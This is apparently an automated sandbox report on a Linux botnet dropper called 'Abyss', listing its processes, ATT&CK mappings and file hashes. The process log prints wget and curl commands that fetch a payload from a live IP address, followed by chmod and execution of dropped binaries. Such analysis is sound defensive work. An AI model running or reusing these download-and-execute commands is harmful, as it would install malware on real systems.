  chmod +x Abyss busybox config-err-xTetUE netplan_ey82z6ny ohshit.sh snap-private-tmp ssh-WOxbGU3ZyI9l systemd-private-31394bd183164e30ab7270cefa65c722-colord.service-B0EdJX systemd-private-31394bd183164e30ab7270cefa65c722-ModemManager.service-vDiwMl systemd-private-31394bd183164e30ab7270cefa65c722-systemd-resolved.service-DoImSo systemd-private-31394bd183164e30ab7270cefa65c722-systemd-timedated.service-j3ZHfg ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1646
- /tmp/Abyss
  ./Abyss
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1647
- /usr/bin/wget
  wget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.sh4
  2⤵
  - Writes file to tmp directory
  PID:1651
- /usr/bin/curl
  curl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.sh4
  2⤵
  - Writes file to tmp directory
  PID:1652
- /bin/chmod
  chmod +x Abyss busybox config-err-xTetUE netplan_ey82z6ny ohshit.sh snap-private-tmp ssh-WOxbGU3ZyI9l systemd-private-31394bd183164e30ab7270cefa65c722-colord.service-B0EdJX systemd-private-31394bd183164e30ab7270cefa65c722-ModemManager.service-vDiwMl systemd-private-31394bd183164e30ab7270cefa65c722-systemd-resolved.service-DoImSo systemd-private-31394bd183164e30ab7270cefa65c722-systemd-timedated.service-j3ZHfg ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sh4 ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1654
- /tmp/Abyss
  ./Abyss
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1655

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/Abyss

Filesize
23KB

MD5
7fc3afdda7fbf993f43067a26cafed89

SHA1
4a422cc19b5c6ab0228cc94e3c0268cc54f720e3

SHA256
e68832c656e933eea0904858518a31956bece42fc31b9ee9a8114331265ea93f

SHA512
be1b011eccaa7c2dcac72c1c15805d00b864623f2e6466e48077720afc6601ff762530e0be201e58eb89ac0c479e9a87631bd123eb4d311f6ea7c4e2827c1dc6

Download Submit
/tmp/busybox

Filesize
2.0MB

MD5
b4dede5fc0b1bad5cb8e901bde126b97

SHA1
10cbe9a418ad84a1ed297948539d37aeb58dd810

SHA256
a9f0735d28f9a6a4f2634d3b144156f7b3df3b476a16a5ab0c7bdf98d74dd020

SHA512
45665ce3a42f63a01fdef517e0c4cb943efce64c8a32d3ce07ab4f1fafc23cda77f378d324342efc79dc9d2293c4b4454d06c1cf4997b9e866784de01cb546e6

Download Submit
/tmp/ub8ehJSePAfc9FYqZIT6.arc

Filesize
105KB

MD5
39984021963a3aa917b249460dd4ede1

SHA1
d2637e855e891be1bd4c577682c2750352f21d8f

SHA256
418c17efde9207470ca3fc2938947846419f95abf0c48e811a9c433bd93ef95d

SHA512
4580ac52c4844114e59a6680fb1ca8928cfa0593fc069681245a5cc97efc84bba373a3e0d8eaf280adb33e7bdd1c61b99eedc0f66dccbfa64b17051bf75b1263

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads